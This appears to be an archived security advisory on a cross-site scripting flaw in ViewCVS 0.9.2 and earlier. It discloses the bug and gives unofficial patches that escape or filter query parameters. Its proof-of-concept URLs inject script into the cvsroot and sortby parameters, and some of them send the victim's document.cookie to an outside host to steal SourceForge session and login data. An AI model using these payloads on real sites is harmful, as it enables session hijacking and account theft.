|
COMMAND ViewCVS cross-site scripting bug SYSTEMS AFFECTED ViewCVS 0.9.2 and below PROBLEM office [http://www.office.ac/] says : ViewCVS is a WWW interface for CVS Repositories. It is widely used in freesoft community and open source community. Unfortunately, it has the vulnerability of cross-site scripting. Proof ----- If you access to the URL like; http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert(\"he llo\")</script> http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><scri pt>alert(\"hello\")</script> The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP. And these URL can do is only showing a popup window appearing. Example ------- For example, you can see the vulnerability at the SourceForge.net (Vendor\'s site is on SourceForge.net). If you access to the sample URL following, your cookie (including your login information and session information about SourceForge.net) is stolen by my site (http://www.office.ac) The stolen cookie\'s information of Internet Explorer 6.0 includes your login information and session information about SourceForge.net. But the stolen cookie\'s information of Opera 6.01 and mozilla 0.9.9 includes only user name, and the cookie information of Netscape 4.78 and 6.2.2 is nothing. (I don\'t know why.) http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>a lert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen %20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi?\'%2Bdocumen t.cookie);</script> http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=re v\"><script>alert(\"ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%2 0is%20stolen%20by%20www.office.ac\");window.open(\'http://www.office.ac/j.cgi ?\'%2Bdocument.cookie);</script> The ViewCVS at SourceForge.net is not newest version. And you can see the vulnerability of newest version of ViewCVS at GNU. http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert(\"hello\" )</script> http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev\" ><script>alert(\"hello\")</script> SOLUTION No official patch yet, check UNofficial ones below : Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System Project (http://www.h14m.org/). --- viewcvs.py.orig Fri Dec 14 23:14:39 2001 +++ viewcvs.py Sun Mar 31 15:24:34 2002 @@ -172,7 +172,7 @@ # parse the query params into a dictionary (and use defaults) query_dict = default_settings.copy() for name, values in cgi.parse().items(): - query_dict[name] = values[0] + query_dict[name] = cgi.escape(values[0]) # set up query strings, prefixed by question marks and ampersands query = sticky_query(query_dict) This code comes from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp (http://sourceforge.jp/) who has offered former patch to the ViewCVS team. RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v retrieving revision 1.107 retrieving revision 1.108 diff -u -r1.107 -r1.108 --- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107 +++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108 @@ -180,8 +180,14 @@ # parse the query params into a dictionary (and use defaults) query_dict =3D default_settings.copy() + + # RE that ViewCVS doesn\'t use in any URL, but a CSS attack might + re_url_validate =3D re.compile(\'\\\'|\"|<|>\') for name, values in cgi.parse().items(): - query_dict[name] =3D values[0] + # do not accept values that contain non-ViewCVS characters + # except for search + if not re.search(re_url_validate, values[0]) or name =3D=3D \'search\'= : + query_dict[name] =3D values[0] # set up query strings, prefixed by question marks and ampersands query = sticky_query(query_dict)